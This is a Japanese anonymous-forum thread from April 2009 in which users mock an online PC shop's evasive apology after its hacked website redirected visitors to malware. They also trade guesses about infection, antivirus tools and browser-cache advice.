/ / / | /| /:::/:.:.:.:.:.:.:|:::::: / 〃 i .::| /:.:.| |::l::|:.:.:.:.:.:.:.:|:::::: ,゙ /| | .:::|. \|:.:.:.:| |::l::|/:.:.:.:.:.:j/:: ! ,' ! ::| ::::|!. ,ィ|≧ゝl、_.;|::ィ|/_:._/ィllヘ l ,' │ ::|:.. ::::|く/ {ひlll|::|ヾ|:.N:.::´〃ひlllリ:: ・・・・・・・・!! ヾ '、 |\ ::::|:.\\こソ:.:.:.:.:.:.:.:.:.:、、\こソ '、 :| \ :::\:.:._,、__彡 _' -─ 、`゙ー= ヾ、/.::>:、:;ヽ、__ /ーァ''"´ ̄ ヽ / .::::::::::::::::ヘ ̄ {|::/ } /...::::::::::::::::::::::::::\ V j}
450 :
フモトスミレ(東京都) :2009/04/07(火) 23:37:52.34 ID:V61PjGML BE:998957186-BRZ(10000)
お詫び文が見つけられないwww
452 :
アメリカヤマボウシ(catv?) :2009/04/07(火) 23:38:07.18 ID:3KI/Spgo
ひょっとしてまだ垂れ流しなのか Opera最強伝説の俺には無関係だが フラッシュは最新にしてるし
’†?A?p?\?R?“?A?p?\?R?“?p?[?c?I’E”I?V?‡?b?v?f?d?m?n
>>451 TOPの上の方にヒッソリと隠れてますw
復旧してもここでは絶対買わないわw
OperaやSafariは平気なのかw
お客様へ 4月4日、4月7日に当社のwebサイトに外部より不正アクセスが有り、一部のプログラムに不具合が生じ、当社のHP以外のページへリンクされる状態が発生しました。ご迷惑をおかけし申し訳ございません。 現在は外部からのアクセスができないように対処いたしました。 現在すべてのプログラムは正常となっております。 すべてのプログラムチェックの為、復旧に時間がかかりましたことを重ねてお詫び申し上げます。 又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。 ・インターネットエクスプローラー6をご利用のお客様 ・インターネットエクスプローラー7をご利用のお客様 ・Firefoxをご利用のお客様 尚、サーバーのウィルス感染や個人情報の流失はございません。 今後はセキュリティーの強化を更に徹底いたします。 このたびは多大なるご迷惑をおかけし申し訳ございませでした。 今後ともよりいっそうのお買い得商品の提供に邁進する所存でございます。 GENOwebを引き続きよろしくお願い申し上げます。 2009年4月7日 web通販ショップ GENO
458 :
フモトスミレ(東京都) :2009/04/07(火) 23:39:29.12 ID:V61PjGML BE:249739643-BRZ(10000)
>又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。
どういう意味だよw
もう大丈夫なのか?本当か?
460 :
ペチュニア(長屋) :2009/04/07(火) 23:39:51.79 ID:PkmMlTGo
>又、旧プログラムを消去するためお客様側の対処といたしましては webブラウザのキャッシュのリセット頂く事をお願い致します。 要約すると無かった事にしたいので証拠は消して下さい。
え、祭りですか?
キャッシュクリアしただけで回復するわけないだろww
463 :
アメリカヤマボウシ(catv?) :2009/04/07(火) 23:41:13.14 ID:3KI/Spgo
スレ読んでる間に対応ってレスがついてたわ…
>>456 OperaはPDFがあってもデフォで開くかどうかを聞いてくるからな
>>437 確かにサーバーはハックされたけど感染してないわなw
また祭ですかー?
結局どれが対応してるんだ
467 :
ポピー(宮城県) :2009/04/07(火) 23:41:48.56 ID:ab5Rpdqx
>尚、サーバーのウィルス感染や個人情報の流失はございません よかった、ウイルスはなかったんだ。
頭大丈夫かよ…どうなってんのマジで
469 :
タツタソウ(福岡県) :2009/04/07(火) 23:42:08.09 ID:0EhaQgLq
>又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。 どうしてもウイルスという言葉は使いたくないみたいだなw
これはひどい
核燃料投下だなw
472 :
キソケイ(大阪府) :2009/04/07(火) 23:42:56.22 ID:B8emn0Ws
全力でいくか?
ウリナラフィルター並に強力な俺様解釈だなw
genoオワテル\(^o^)/
やった! 前スレの7に予想したのがほぼ当たっててちょっと嬉しい!
GENOが俺の中でザコンレベルのショップになり下がった瞬間だった
終わったのか
でもまあ問題は解決したんだからこれにて一件落着 ・・・した、のか?????
まれに見るクソサイト
482 :
フモトスミレ(東京都) :2009/04/07(火) 23:44:45.45 ID:V61PjGML BE:374609636-BRZ(10000)
ということはアンチウイルスソフトの誤作動ってこと?
これはアンチウイルスソフト会社に損害賠償請求すべき。
483 :
タツタソウ(福岡県) :2009/04/07(火) 23:45:18.39 ID:0EhaQgLq
>尚、サーバーのウィルス感染や個人情報の流失はございません。 ウイルスではないと? 実際、感染するとラトビアにパケット飛ばすんだろ?
484 :
オダマキ(アラバマ州) :2009/04/07(火) 23:45:22.78 ID:RVO46BVa
これは・・・まじに許せんわ
パートスレなんか立てちゃって・・・ お前ら釣られてんじゃねーぞ
486 :
フデリンドウ(東京都) :2009/04/07(火) 23:45:44.73 ID:UPpZUNuf
全力だろこれは
487 :
ジャーマンアイリス(福岡県) :2009/04/07(火) 23:45:49.79 ID:977aDJfB
これは酷い('A`)
488 :
ペチュニア(長屋) :2009/04/07(火) 23:45:53.25 ID:PkmMlTGo
>尚、サーバーのウィルス感染や個人情報の流失はございません。 ハッキングされたのに?
489 :
ハナモモ(宮崎県) :2009/04/07(火) 23:46:09.81 ID:07SNJE2W BE:17085683-2BP(7)
>>437 言葉の意味はよく分からんがとにかく凄い自信だ
この謝罪文の内容を本気で書いてるとしたら 施した対策は サーバーに潜んでるウイルス本体を見つけれないから 単純にラトビアを禁止リストに入れただけだろうな 飛ばされないだけでサーバー内部の書き換えは現在進行形で行われてるかもwww
491 :
フモトスミレ(東京都) :2009/04/07(火) 23:46:21.00 ID:V61PjGML BE:998957186-BRZ(10000)
>>483 ラトビアへのリンクがあって
そこにウイルスがあったのではないのか?
これで明日また改ざんされてたらさらに燃料投下。 特価といいいつも期待させてくれるぜ。
493 :
ドデカテオン メディア(catv?) :2009/04/07(火) 23:46:52.46 ID:FwthmTsl
謝る気さらさらないwwwwwwwwwwwwwwww 感染した奴哀れwwwwwwwwwwwwwww
>>472 だな〜〜
こりゃだめだ。。。。。
彼の国じゃ焼き討ちにされても文句言えないぞ
ショッピングサイトとしてはもう致命的なんだがな
496 :
ポピー(宮城県) :2009/04/07(火) 23:47:15.01 ID:ab5Rpdqx
>>477 これで死にかけたPCが本当に治ったりしてなw
だったら許すわ
497 :
フモトスミレ(東京都) :2009/04/07(火) 23:47:18.83 ID:V61PjGML BE:1498435889-BRZ(10000)
俺なんて1日かけてリカバリしたのに・・・
498 :
タニウズキ(埼玉県) :2009/04/07(火) 23:47:22.73 ID:MZdir2he
>>437 ____
:/ノし \:: ___
:/ ⌒ u; \:: /― \
:/ 、 \: / (●) \ ヽ
:| ^ |: /(⌒ (●) |
\ ;j /: |  ̄ヽ__) |
/⌒ ゚ (´ ヽ /
/ ゚ 〜、 ,⌒\ ni777 /
/ j(, r 、゚ \ / .ノ `\
/ ゝ jヽ / i |
/ :j ゚ | \ / .i |
| |: \/| | |
| ゚ :j |: | u_)
いますぐ忘れろっってことか!
>又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。 旧プログラムって何だ?
>>437 確かこの騒動のはじめ頃に4月3日くらいにGENO覗いたらブラウザ落ちてラトビアに連れてかれたって書き込みがあったような?
502 :
オダマキ(アラバマ州) :2009/04/07(火) 23:47:53.78 ID:RVO46BVa
もし見てるんならウイルス製作者を盛大に応援するよ。俺は。 こんなアホな対応あるか!!!
>>483 サーバーがウイルスに感染してないだけで
サーバー上にあるWebページにアクセスした俺らのPCにウイルスをばら撒いていないとは一言も言ってないw
504 :
フモトスミレ(東京都) :2009/04/07(火) 23:48:20.94 ID:V61PjGML BE:208116252-BRZ(10000)
>>500 もしや、GENO自体にプログラムが仕掛けられていたのでは?!
505 :
ヤブツバキ(東京都) :2009/04/07(火) 23:48:30.45 ID:+PHwL32w
>>437 ウイルス仕込んだ人を応援したくなる流れだなw
507 :
カラタネオガタマ(東京都) :2009/04/07(火) 23:49:09.93 ID:T+ZBdjlc
俺再インストールまでしてだめなんですけどw
>>491 一回はリンクを削除したのに復活したって事は
ラトビアへのリンクを作ってたウイルス本体が有るはず
流石にもうそろそろ全面降伏でごめんなさいしたろと思って来てみたら糞対応でワロタ。 駄目だろこれ。
510 :
フモトスミレ(東京都) :2009/04/07(火) 23:50:03.43 ID:V61PjGML BE:749218649-BRZ(10000)
頭の中のメモリキャッシュもクリアしろだとッ!? 数秒後…… さぁって今日もGENOで特価やってるかなぁ♪るんるん
512 :
ペチュニア(長屋) :2009/04/07(火) 23:50:24.85 ID:PkmMlTGo
>500 JSファイル
513 :
コバノランタナ(千葉県) :2009/04/07(火) 23:50:37.94 ID:hD4R3NI8
こーなったらUNIX板の方々にお出で頂いて Geno鯖の穴探しをしてもらうしかない感じだな。
514 :
ジンチョウゲ(長野県) :2009/04/07(火) 23:50:50.74 ID:0zhKkWJr
NOD32 最強 伝説
>>508 いやあれウイルスじゃなくてサーバに侵入されて遠隔操作でやられてる。
泣き寝入りなのか
517 :
ラフレシア(東京都) :2009/04/07(火) 23:51:11.25 ID:Yn6ot/oR
そしてもう既にハックされている罠w
519 :
ヤブツバキ(東京都) :2009/04/07(火) 23:51:25.93 ID:+PHwL32w
juicy rockといいgenoといい、信用商売って建前なんだろうけど ちゃんとしたこと言わないのは腹立つな
520 :
フモトスミレ(東京都) :2009/04/07(火) 23:51:28.18 ID:V61PjGML BE:124870223-BRZ(10000)
4日と7日に進入されたってあるしな
、、 、 |``ヽ r'' 、>.、..-‐…‐―-....|i ハ | | ヽ >''. : :xi ト、: : : : : `ヽ__i|| │ ヽ/ `` ! /.∨. .:.:.:,' !! ∨ :-=ニ二ハ ヽ/ `` │ !_ ', /ニ/= .:// i| ヽ__: : : : :!::. !_ | 〉 ,'.:.:/ .:.:.::/´ { リ: `: : :.:!:.i | ‐┼┐ヽ / _N、i.::/! .::::/! ヽ ∨ハ.:.:!i:| ‐┼┐ヽ |. │亅 | 〉 |:/ ! .:.イ '⌒ , ⌒ヽ ヽハノリ!:!i7 │亅 / | ヽ {′! :::i〉,,, ___ ,,, 从ノノ::::::i!:| '⌒ヽ | | /ヾノハ:八 ∨:::Yノ .イ爪リ:! | | | | !/ヽ:.:.:.:.゙`}:ト... ` .. ィ:{:i:!ハ,′ │ | | ヽ:.:.:.:.:ノハr‐rト、 ..ィト.、:!:ノ ,′ │ / | 丶. .::´:::::i::::∨ハ∨:::ー‐ト、 / | /ヘノ ! 丶:.:|:.:.:\「:.7/.:.:.:/ ,ィ /へノ | ', ヽ!:.:.:.:.:.ヽ':.:.:.:.:.:/ ,ィ´│ | ,ヘ /⌒ヽ /⌒丶 |:.:.:.:.:.:.トi:.:.:.:.://:.:i | /⌒ヽ |/ !/ V |:.:.:.:.:.:.|:l:.:.:.:.'´:.:.:.:.| |/ \ ′ |:.:.:.:.:.:.|:.!:.:.:.:.:.:.:.:,イ ′ `┬-、;,;,:. ri¬Tヽヽ
522 :
オンシジューム(dion軍) :2009/04/07(火) 23:51:44.59 ID:E6hQ6liv
全力でいくか?
geno側が何言ってるのかわかんね、つーか完全になめてるだろ
Avast更新きたけどLa.exeは反応しないね
525 :
ポピー(宮城県) :2009/04/07(火) 23:52:15.90 ID:ab5Rpdqx
で、やっぱりまだやばいの? 踏む気にならんのだが
526 :
サクラソウ(アラバマ州) :2009/04/07(火) 23:52:16.82 ID:CmA/0NPP
去年から踏み台にされてプロクシ立てられたりしてたのに 個人情報流出が無いとは厚顔無恥も甚だしい
527 :
雪割草(大阪府) :2009/04/07(火) 23:52:17.25 ID:GZFglH2y
____ :/ノし \:: ___ :/ ⌒ u; \:: /― \ :/ 、 \: / (●) \ ヽ :| ^ |: /(⌒ (●) | 殴るの? \ ;j /: |  ̄ヽ__) | 2chで話し合うけど? /⌒ ゚ (´ ヽ / / ゚ 〜、 ,⌒\ ni777 / / j(, r 、゚ \ / .ノ `\ / ゝ jヽ / i | / :j ゚ | \ / .i | | |: \/| | | | ゚ :j |: | u_)
528 :
フモトスミレ(東京都) :2009/04/07(火) 23:52:21.21 ID:V61PjGML BE:936522195-BRZ(10000)
まて、このお詫びも
凄腕ハッカーが書いたのではないか。
何やってんだよAvast死ねッ
530 :
キクザキイチゲ(長崎県) :2009/04/07(火) 23:52:25.30 ID:USU16M49
>>444 フー、安心した
さすがGENOcideだぜ!
流石は2万の福箱にリース落ちジャンクノートを入れたGENOさん 超パネェ。カッケーっす
>>508 ,515
という事はラトビア以外に飛ばしてそこで感染させる事も可能ということか
533 :
コバノランタナ(千葉県) :2009/04/07(火) 23:52:49.60 ID:hD4R3NI8
>>515 リモート操作される脆弱性が突かれてるんだっけ。
それでこれまで散々漏れ串として使われたり、今回の問題が起こったって訳なんでしょ?
534 :
サトザクラ(長屋) :2009/04/07(火) 23:52:49.89 ID:ZyWED150
つまり、サーバをハックされたがWebページを改編されただけでサーバ自体にウイルスが仕掛けられたわけではない 改変されたページから外部のウイルスサイトに飛ばされたPCには感染しているかもしれないが、それには触れない とりあえずキャッシュ消せば新たにウイルスサイトに飛ばされることはないと こういうことか でもハックされたんだから顧客情報も危ないと思うが
ラトビアって国のラトビアか? だとしたらなんでだろう
537 :
サトザクラ(東京都) :2009/04/07(火) 23:52:59.92 ID:YcIo+r6z
___ ./ \ .| ^ ^ | | .>ノ(、_, )ヽ、.| __! ! -=ニ=- ノ!_ .| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| ,. -‐ '| | / :::::::::::| あまり |__ / :::::::::::::| rニ-─`、 . / : :::::::::::::| 私を `┬─‐ .j 〈:::::::::,-─┴-、 |二ニ イ . | ::/ .-─┬⊃ |`iー"| .レ ヘ. .ニニ|_____________|rー''"| 〈 :::::\_ノ::::::::::::::::::::::::::::::::::::::::::::::::::::::: |:::::::: /::::::::::::| _ / \ / ノ( \ | ^ ⌒ ^ | | .>ノ(、_, )ヽ、.| <怒らせない方がいい ! ! -=ニ=- ノ! | ̄ ̄ ̄〉,ァ''" \`ニニ´/゙ア´ ̄`/ ̄ ̄ ̄ ̄| | `r´、、__ l ! ィ彡,ャァ'" ,,..,,、\ | ,-┴-、 あ〈.,, ``''ヽ,,, ''"´ ゙''ヾミ,r/.く |__ / .-┬⊃ < ,;,, ;;; ,,;; ,fr::<, rニ-─`、 ! ;;ニ| / ';;;;;;;;;;;' ,!;V:.:ノ `┬─‐ j \_| < ':;;;;;:' ,;;/;;:.:/:〈 私を |二ニ ノ | < 人__,,,;;;;;ノ/N/:/:.< |`ー" |__/:ト-―テ" ⌒ `ヾj ::;;;;}/:.:.:∠____| l ' -:十:‐' ゙l, 〃:.:.:/:.リ ビリィィィ l t,,__,災_,ノl f:.リ:.:./:.j
で、TOP以外も感染しなくなったのか?
539 :
節分草(空) :2009/04/07(火) 23:53:26.36 ID:SJHHhh4f
541 :
タニウズキ(埼玉県) :2009/04/07(火) 23:53:47.54 ID:MZdir2he
542 :
ドデカテオン メディア(catv?) :2009/04/07(火) 23:53:57.41 ID:FwthmTsl
感染した人は訴えていいぞw
GENO復活ワハハハッハハハッハハハ!!!!
544 :
クレマチス(埼玉県) :2009/04/07(火) 23:54:00.36 ID:dqr+GOkP
>尚、サーバーのウィルス感染や個人情報の流失はございません。 修正した数時間後にまた仕込まれるぐらい好き勝手やられてたのにw 信用できるかよww
ウチは外に飛ばされる書き換えだけされて、そっから先のセキュリティはしらねーよってこと?
電話とかした奴いねーの?
おいどういうことだよ 二時間前に開いた火スペのオンラインスキャン始まってすらいねーぞ 重すぎなんだよハゲ
549 :
コバノランタナ(千葉県) :2009/04/07(火) 23:54:49.70 ID:hD4R3NI8
GENOは今回のイベントで愛用者が増えましたなぁ
右下のゼロの意味がわからん
ゼロからやり直します?
謝罪の意思ゼロ?
>>446 ?
明日は祭りかな・・・
こうなると予想したけどパクられたかな 7 名前: ムラサキハナナ(アラバマ州)[sage] 投稿日:2009/04/07(火) 11:15:34.84 ID:VjYRIe8b 当社ではウイルスを配布した実績はございません。 ただし特定のURLに自動的に接続するコードは時々ではありますが埋め込んである場合があります。 なお、これはサーバーの仕様となります。自動的に接続する先のファイルは直接悪さをするわけではなく、 どこか他への誘導があるようですが、別の場所の事なので当社の責任管理下にありませんので 当社では詳細はわかりません。ご了承くださいませ。
555 :
コスミレ(関東・甲信越) :2009/04/07(火) 23:56:29.69 ID:cZ2ABlUJ
>>548 何言ってるか分からん
日本語で書き込め
よくわからんがgeno復活オメ
俺今日からウィルスのことを旧プログラムと呼ぶことにしたよw
559 :
サンシュ(神奈川県) :2009/04/07(火) 23:57:08.99 ID:Hf3mn1sP
おれはゲノの対応に本気で怒っている 絶対にゆるさんぞ おまえら全力で抗議しろ
GENOが安全宣言したからもうウイルスチェックしなくていいや 安心、だ、よね…
562 :
フモトスミレ(東京都) :2009/04/07(火) 23:57:28.82 ID:V61PjGML BE:332986728-BRZ(10000)
563 :
オダマキ(アラバマ州) :2009/04/07(火) 23:57:37.41 ID:RVO46BVa
564 :
ペチュニア(長屋) :2009/04/07(火) 23:57:38.74 ID:PkmMlTGo
>548 お前みたいのが殺到してるからだろ
ハックされたんなら下手なウイルスよりタチが悪い やっぱり利用者の情報が抜かれたりしてるんだろうな〜 GENO利用した事ある人達(-∧-;) ナムナム
>>545 AVGちゃんと商用のライセンスとってんのかな?
nortonのDaily Intelligent Updaterを食わせて実行したらキャッシュ内の.jsは退治できたんだがどうなんだろう。 つか同じころにアマゾンのジョーシンの決済で使った俺のクレカは無事ですか?
ウイルスのことも書けばよかったのに…
旧じゃなくて1日プログラムだったのかも知れん
これにて一見楽着
571 :
ヤエヤマブキ(宮城県) :2009/04/07(火) 23:59:19.09 ID:QJe2wkJD
こわくてgeno踏めねぇえ
572 :
キクザキイチゲ(長崎県) :2009/04/07(火) 23:59:28.09 ID:USU16M49
二度と行くかこんな糞サイト 存在すら知らなかったが
enjoy! Digital Life だってお!(AA略
>>554 あぁ、これは間違いなくパクられてるなw
これで一段とメジャーになった これから目が離せないゾナ
578 :
フリージア(東京都) :2009/04/08(水) 00:01:34.22 ID:3FM9FGnp BE:624348656-BRZ(10000)
>>437 . .: : : : : : : : :: :::: :: :: : :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
. . : : : :: : : :: : ::: :: : :::: :: ::: ::: ::::::::::::::::::::::::::::::::::::::
. . .... ..: : :: :: ::: :::::: :::::::::::: : :::::::::::::::::::::::::::::::::::::::::::::
Λ_Λ . . . .: : : ::: : :: ::::::::: :::::::::::::::::::::::::::::
/:彡ミ゛ヽ;)ー、 . . .: : : :::::: :::::::::::::::::::::::::::::::::
/ :::/:: ヽ、ヽ、 ::i . .:: :.: ::: . :::::::::::::::::::::::::::::::::::::::
/ :::/;;: ヽ ヽ ::l . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
 ̄ ̄ ̄(_,ノ  ̄ ̄ ̄ヽ、_ノ ̄ ̄ ̄ ̄
580 :
セキチク(長屋) :2009/04/08(水) 00:01:58.63 ID:joAw9Nrh BE:104998166-PLT(12203)
こりゃジェノサイドやで( ´∀`)b
>>518 >4日だな
つか
>>1 いや、確かに
>>1 は4日になってんだけど。
4月4日にスレができて、そのときは3日に踏んだけどそれから調子悪いって言ってたやつがちらほらいと思うんだ。
で、結局アウトセーフの境目はいつなんだ?ってなってた。
こいつらいつ仕込まれたかも把握できないのか?と思ってさ。
582 :
ポレオニウム・ボレアレ(宮城県) :2009/04/08(水) 00:02:27.03 ID:ab5Rpdqx
勇気出してトップ踏んでみたらお詫びが見当たらない
583 :
コブシ(千葉県) :2009/04/08(水) 00:02:27.70 ID:/Euywwyx
>>578 ある意味どれだけ早く管理ポスト送りになるかを見てみたい気がするw
上場の日も近い
もはや笑いがこみ上げてきたwwwww 糞だろ、糞もいいところだろgenoさんよおおおおお
>>545 AVGとノートン先生www
こりゃ駄目だw
587 :
リナリア(東京都) :2009/04/08(水) 00:03:02.16 ID:Yn6ot/oR
ジェノに踊らされて右往左往してる奴も大変だな、ジェノサイドダンサーズ
588 :
オニタビラコ(アラバマ州) :2009/04/08(水) 00:03:06.29 ID:RVO46BVa
∧..∧ . (´・ω・`) これがほんとの cく_>ycく__) じぇのさいど (___,,_,,___,,_) ∬ 彡※※※※ミ 旦  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ \ どっ!! / \ ワハハ! / \ / \ ∞ l|||||||||||||| ∩,,∩ ∩,,∩ ∩,,∩ ミ∩ハ∩彡 (, )(,, ) ,,)( )( )
589 :
フリージア(東京都) :2009/04/08(水) 00:03:08.75 ID:V61PjGML BE:416232454-BRZ(10000)
こんな時に限って仮想OSの調子が悪い・・・・・
迅速且つ正確・適切な対応には感服した
期待を裏切らない姿勢が大変すばらしいw
お詫びまだぁ?
お詫びはTOPの上ちょい下あたりに 今回のサーバートラブルについてのお詫び と小さなリンクがある まあ、わかりずらいんですけどね
客のPCはどうでもいいんですね
596 :
オニタビラコ(アラバマ州) :2009/04/08(水) 00:04:59.61 ID:uklzKC3H
サーバー・・・・トラブル・・・・ ?!
598 :
ポロニア・ヘテロフィア(岡山県) :2009/04/08(水) 00:05:24.35 ID:DYCwWaKV
何かPC重いから再起動したいんだけど ブルースクリーンで再起不可のウイルスの可能性もあんの? 重すぎてスキャン出来ねーしどうすりゃいいんだよ
ウイルスに感染したらGENOで新しいPC買ったらいいじゃないの
たいがーッッ じぇのサイドッ!!!!
601 :
フリージア(東京都) :2009/04/08(水) 00:05:44.27 ID:V61PjGML BE:208116252-BRZ(10000)
>>593 お詫び?
ウチが悪いんじゃなくてリンク先が悪さしたのになんでウチがお詫びしなきゃならないのさ???
変な言いがかりつける様なら訴えるよ君!!
とか思ってたりしてwww
603 :
ポレオニウム・ボレアレ(宮城県) :2009/04/08(水) 00:06:09.15 ID:ab5Rpdqx
>>594 ホントだ
マジでわかりずれぇ
トップがこのお詫び文かと思ったのに・・・
604 :
オニタビラコ(アラバマ州) :2009/04/08(水) 00:06:18.31 ID:RVO46BVa
605 :
トベラ(catv?) :2009/04/08(水) 00:06:23.50 ID:QPknj9je
これ外部サイトに飛ばされるようになってただけですって言ってるけど ウイルスが外部サイトにあるかGENOSIDEにあるかだけの違いだろ。 どっちでも同じだっちゅーの。
606 :
フモトスミレ(東京都) :2009/04/08(水) 00:06:29.73 ID:UPpZUNuf
キャッシュ即消しでなんでも解決できるんだな
>>598 うん、ウイルス配布元がキャッシュ消すだけでいいらしいよ
バックドアなんてないらしいよ
608 :
フリージア(東京都) :2009/04/08(水) 00:06:38.75 ID:V61PjGML BE:208116252-BRZ(10000)
今アクセスしても平気?
今からIE起動するが
>>599 感染済みのPCを買うんですね
612 :
キクバクワガタ(長崎県) :2009/04/08(水) 00:07:22.40 ID:OPsPQNjM
よっしゃ、キャッシュを消すか これで俺も安全だな netstat?何それうまいの?
614 :
フリージア(東京都) :2009/04/08(水) 00:07:43.74 ID:3FM9FGnp BE:874087676-BRZ(10000)
>>611 firefox 画像もオフにしてんだよ
615 :
オオジシバリ(長屋) :2009/04/08(水) 00:07:47.73 ID:gfCN7gdd
Antivirタソ対応した?
616 :
ハナワギク(宮崎県) :2009/04/08(水) 00:07:53.90 ID:07SNJE2W BE:39867078-2BP(7)
NoScript最強すぎるだろ
617 :
ヤブテマリ(東京都) :2009/04/08(水) 00:08:11.48 ID:EycPhH+T
僕達の冒険はこれからだ! GENO先生の次回作にご期待ください。
>>618 スーパーハカー御用達PCか すげぇーー!!
620 :
キクバクワガタ(長崎県) :2009/04/08(水) 00:09:40.55 ID:OPsPQNjM
まだまだスレは地味に続きそうだな
621 :
ヤブツバキ(dion軍) :2009/04/08(水) 00:10:03.08 ID:l6DWRkpd BE:535953762-2BP(0)
諦めて集団告訴と行こうか。
622 :
ハナワギク(宮崎県) :2009/04/08(水) 00:10:04.04 ID:JEMZ34a8 BE:14238645-2BP(7)
やっぱGENOのアウトレットはWordPress ME2.0.10つこうてるらしい。 わくわくさせるぜ。
624 :
トベラ(catv?) :2009/04/08(水) 00:10:37.88 ID:QPknj9je
GENOSIDEにウイルスはありませんでした GENOSIDEにウイルスはありませんでした GENOSIDEにウイルスはありませんでした
625 :
コブシ(千葉県) :2009/04/08(水) 00:10:43.98 ID:/Euywwyx
>>620 この調子だとニュース議論送りになっても延々と続きそうだと思うw
626 :
フリージア(東京都) :2009/04/08(水) 00:11:05.23 ID:3FM9FGnp BE:374610029-BRZ(10000)
2ちゃん史上最大の祭りになるとはこのとき誰も
おいおいウイルス対策ソフト死亡したのもブラウザのキャッシュ消せば直ってたのかよ リカバリの意味なかったぜ
亜種とかありそうだしOpera使うか・・・
629 :
ポレオニウム・ボレアレ(宮城県) :2009/04/08(水) 00:11:37.73 ID:qzQWYMsR
他のサイトも感染してる可能性あるんでしょ? これからもこういう事がおこる度にジェノサイドって言われるだろうな
で、genoにもうアクセスしてもいいでしか?
>>630 いいんでしょ GENOが安全宣言してるんだし
また、明日当たり改ざんされるんじゃね? もしそうなったら、本気で笑うがww
634 :
コブシ(千葉県) :2009/04/08(水) 00:13:47.56 ID:/Euywwyx
>>629 genoと同じ鯖環境で動いているサイトだともちろん同じ脆弱性を突かれて
ウィルスを撒き散らす可能性があるよ。
GENOの戯言とは思ったがIEのキャッシュ消してみた 案の定IEとノートン先生が落ちた、当たり前だが全く効果なし
さぁーてじゃあ、努力の結晶 GENO鯖にあら探しするか
637 :
リナリア(東京都) :2009/04/08(水) 00:14:25.66 ID:PZBM5WTT
次の改竄がいつ頃になるか予想するスレになるだけ、24時間以内だろうけどw
ラトビアを禁止にしただけなら改ざんされるだろうね〜
639 :
オニタビラコ(アラバマ州) :2009/04/08(水) 00:15:37.00 ID:uklzKC3H
640 :
フリージア(東京都) :2009/04/08(水) 00:15:48.48 ID:3FM9FGnp BE:1019768977-BRZ(10000)
おそらく、警察にも通報してないんだろうな。
新聞広告出した日とかに狙われたら
マジで感染者やばいことになりそう
なんなのこのクソ対応は どうすりゃ向こうは素直に謝るのかね?
この騒動もう普通に終わりそうだな
やっと安全に買い物できるようになって良かった 記念に何かポチろうかな
644 :
コブシ(千葉県) :2009/04/08(水) 00:16:45.30 ID:/Euywwyx
>>640 警察どころか、恐らくIPAの岡ちゃんにも話を通していないと思うw
IE6で一通りみたけど 大丈夫っぼいね、ただし※
これで終わったと思うなよ 光ある所に影が出来るように GENOある限りGENOウイルスは何度でも蘇る!!><
647 :
ケンタウレア・モンタナ(愛媛県) :2009/04/08(水) 00:16:55.47 ID:OaPujcLZ
みんなおつかれw
648 :
ノボロギク(長崎県) :2009/04/08(水) 00:17:33.33 ID:tDwlil3w
そうか俺のWindowsスタートボタンがちかちかしてんのもこれのせいか・・・
650 :
トベラ(catv?) :2009/04/08(水) 00:17:44.37 ID:QPknj9je
1万9千円で19万のPC売った丸紅とは真逆の対応だ。 誠意のかけらも感じないw 保身いのち!
アバストたんはゴメンなさいしないといけないね ゴメンなさいのAAくらはい
会社クビになった人も出たというのに・・・(自業自得だが)
653 :
フリージア(東京都) :2009/04/08(水) 00:18:02.02 ID:3FM9FGnp BE:1123826696-BRZ(10000)
www.geno.co.jp/
こっちには謝罪すらないんだな
654 :
ポレオニウム・ボレアレ(宮城県) :2009/04/08(水) 00:18:16.43 ID:qzQWYMsR
ウイルス踏んだ人たちが被害届け出せばいいんじゃないの? 偽装貼ったやつらも一緒に 件数多ければニュースもでかくなるよ
みんな短い間でしたがお世話になりました
657 :
ハナムグラ(アラバマ州) :2009/04/08(水) 00:19:07.29 ID:r6eE7j6E
このウィルスネタが起きるまで知らなかったショップだが こんなに話題になってるって事は何気に有名な所だったのか? 自作パーツ激安売りとかそんなんか?
658 :
クレマチス・モンタナ(埼玉県) :2009/04/08(水) 00:19:14.08 ID:H0dEstr6
とりあえず感染した奴は文句のメール撃てばいいのか? なんかこのまま無かったことになるのが一番腹立つな
660 :
リナリア(東京都) :2009/04/08(水) 00:19:29.80 ID:PZBM5WTT
まず鯖トラブルってところからして間違いだし、完全に隠蔽モードに突入w
なんだか心が晴れ渡るようだ これで新しい未来(明日とかいてみらいとよむ)にむかって歩き出せるな
663 :
フリージア(東京都) :2009/04/08(水) 00:21:27.98 ID:3FM9FGnp BE:520290555-BRZ(10000)
微妙なサイトの重さといい 画面の表示もっさり感といい 直ってないかも感がして、スリル満点すぎる
665 :
フリージア(東京都) :2009/04/08(水) 00:22:14.36 ID:3FM9FGnp BE:124870032-BRZ(10000)
587 :名無しさん :sage :2009/04/08(水) 00:20:23 0
別にgenoは悪くないのに何でこんなに粘着行為してんの
営業妨害じゃねーの
サイトに行きたくないから連絡先が分からないんじゃね
また深夜にハックされて明日お祭りですねw
669 :
トベラ(catv?) :2009/04/08(水) 00:24:31.68 ID:QPknj9je
ハッカーがjsじゃなくscriptタグを直接埋め込んでたらjs offにしててもアウトだったな。
いい加減にしろ もう二度と買わねえよ 責任とれよ くそげの
672 :
エイザンスミレ(関西地方) :2009/04/08(水) 00:25:33.42 ID:+euCZN0b
よく分からんのだけどこういうのって株価とかにもやっぱり影響出るの?
673 :
オニタビラコ(アラバマ州) :2009/04/08(水) 00:26:29.07 ID:uklzKC3H
>尚、サーバーのウィルス感染や個人情報の流失はございません。 流失はなかったけど流出はあったとか?
